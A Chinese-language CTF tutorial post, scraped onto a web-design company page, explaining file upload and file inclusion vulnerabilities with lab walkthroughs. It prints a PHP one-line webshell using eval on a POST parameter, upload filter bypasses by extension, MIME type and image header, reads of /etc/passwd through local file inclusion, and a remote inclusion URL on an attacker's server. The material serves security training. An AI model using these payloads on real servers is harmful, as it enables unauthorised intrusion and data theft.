专业网站建设设计服务如何做线上销售和推广
2026/2/17 8:13:41 网站建设 项目流程
专业网站建设设计服务,如何做线上销售和推广,大连网站建设怎么样,廊坊手机网站制作CTF Web模块系列分享#xff08;四#xff09;#xff1a;文件上传/包含漏洞#xff0c;突破服务器的文件屏障 上期我们拆解了XSS和CSRF这两个客户端漏洞。 今天咱们进入系列的第四期——文件上传/包含漏洞专题。这两类漏洞堪称Web模块的服务器突破神器#xff0c;核心逻…CTF Web模块系列分享四文件上传/包含漏洞突破服务器的文件屏障上期我们拆解了XSS和CSRF这两个客户端漏洞。今天咱们进入系列的第四期——文件上传/包含漏洞专题。这两类漏洞堪称Web模块的服务器突破神器核心逻辑是让服务器执行不该执行的文件在CTF中属于中高频题型很多中等难度的Web题都围绕这两个漏洞展开。学会这两个漏洞你的Web解题能力会再上一个台阶今天的内容依旧是原理实战的模式先拆清楚两个漏洞的核心逻辑再用具体题目手把手教你解题新手也能轻松跟上。一、先分清文件上传和文件包含的核心区别很多新手会把这两个漏洞放在一起学因为它们经常搭配出现但核心逻辑完全不同先记牢区别文件上传漏洞攻击者将恶意文件比如一句话木马上传到服务器只要服务器能执行这个文件就能获取服务器权限。文件包含漏洞服务器的脚本代码中使用了包含文件的函数比如PHP的include攻击者通过控制包含的文件路径让服务器执行恶意文件可以是本地文件也可以是远程文件。通俗总结 文件上传是“把坏文件放到服务器上” 文件包含是“让服务器主动去读并执行坏文件”。二、文件上传漏洞核心逻辑与实战绕过文件上传漏洞的本质是服务器对用户上传的文件过滤不严格比如只检查文件名后缀、MIME类型导致恶意脚本文件被成功上传并且能被服务器执行。1. 新手必懂的3种基础绕过方式CTF中文件上传的过滤方式很多新手先掌握这3种最基础的绕过技巧能解决60%的基础题后缀名绕过原理服务器只禁止了php、asp等常见脚本后缀没禁止php5、phtml等不常见后缀这些后缀在部分配置下也能被执行操作将恶意文件的后缀改为php5、phtml、php3等比如把shell.php改为shell.php5再上传。MIME类型绕过原理服务器只检查文件的MIME类型比如图片文件的MIME是image/jpeg不检查文件内容操作用Burp抓包将文件的Content-Type字段改为合法的MIME类型比如image/jpeg、image/png比如把php文件的Content-Type从application/octet-stream改为image/jpeg。文件内容伪装绕过原理服务器检查文件头部是否为图片格式比如JPG文件头部是FF D8 FF不检查后续内容操作在php文件开头添加图片头部内容比如FF D8 FF保存为jpg后缀再结合后缀名绕过或MIME绕过上传。2. 实战演练文件上传绕过拿shell以CTFshow新手场的文件上传题目为例解题步骤题目场景打开题目链接是一个图片上传页面提示“仅允许上传jpg、png格式图片”我们需要上传一句话木马文件获取服务器权限后找到Flag。解题步骤准备一句话木马新建txt文件写入PHP一句话木马新手常用?php eval($\_POST\[cmd\]);?保存为shell.php测试后缀过滤直接上传shell.php页面提示“文件格式不允许”说明后缀被过滤尝试后缀名绕过将shell.php改为shell.php5再次上传页面提示“上传成功”并返回文件路径比如http://题目地址/upload/shell.php5连接一句话木马用蚁剑、菜刀等工具输入文件路径设置连接密码为cmd连接成功后即可获取服务器文件列表查找Flag在服务器根目录、/var/www/html、/tmp等常见目录中查找Flag文件打开即可获取Flag格式flag{xxx}。三、文件包含漏洞核心逻辑与实战利用文件包含漏洞的本质是服务器脚本比如PHP使用了动态包含文件的函数include、require并且包含的文件路径由用户控制没有做严格过滤导致攻击者可以指定包含恶意文件。1. 新手必懂的2种包含类型本地文件包含LFI原理包含服务器本地的文件比如包含/etc/passwdLinux系统用户文件、phpinfo.php等常见场景URL参数为文件路径比如http://题目地址/index.php?filehome.php其中file参数控制包含的文件。远程文件包含RFI原理包含远程服务器上的文件比如攻击者服务器上的恶意脚本需要服务器开启allow_url_include配置常见场景URL参数为远程文件地址比如http://题目地址/index.php?filehttp://攻击者服务器/shell.txt。2. 实战演练本地文件包含找Flag以CTFshow新手场的本地文件包含题目为例解题步骤题目场景打开题目链接URL为http://题目地址/index.php?filewelcome.txt页面显示welcome内容我们需要通过file参数包含本地文件找到Flag。解题步骤测试文件包含漏洞将URL改为http://题目地址/index.php?filephpinfo.php页面显示phpinfo信息说明存在本地文件包含漏洞尝试包含常见敏感文件将URL改为http://题目地址/index.php?file/etc/passwdLinux系统页面显示系统用户信息说明可以包含系统文件查找Flag文件根据题目提示或CTF常见Flag路径尝试包含/flag、/var/www/html/flag.php等路径将URL改为http://题目地址/index.php?file/flag页面直接显示Flag格式flag{xxx}。四、新手避坑学习建议文件上传重点记“绕过思路”不要死记payload要理解服务器的过滤逻辑针对性绕过。文件包含注意“路径拼接”如果题目中file参数有固定前缀比如file./include/xxx需要用…/跳转目录比如file…/…/flag。必备工具Burp Suite抓包改包、蚁剑/菜刀连接一句话木马。推荐靶场CTFshow新手场文件上传/包含专题、DVWA中难度模式、Upload-Labs专门练文件上传。五、下期预告今天我们搞定了文件上传和文件包含这两个核心漏洞下期我们将进入系列的最后一期——Web实战技巧总结涵盖解题工具进阶使用、常见题型思路梳理、比赛答题技巧等帮大家整合前面所学的知识轻松应对CTF比赛中的Web题目。如果今天的内容对你有帮助别忘了点赞、在看转发给一起学CTF的小伙伴CTF学习资源分享网上虽然也有很多的学习资源但基本上都残缺不全的这是我们和网安大厂360共同研发的的网安视频教程内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识而且包含了中级的各种渗透技术并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频100多本网安电子书最新学习路线图和工具安装包都有不用担心学不全。给大家准备了2套关于CTF的教程一套是涵盖多个知识点的专题视频教程这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源另一套是大佬们多年征战CTF赛事的实战经验也是视频教程这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询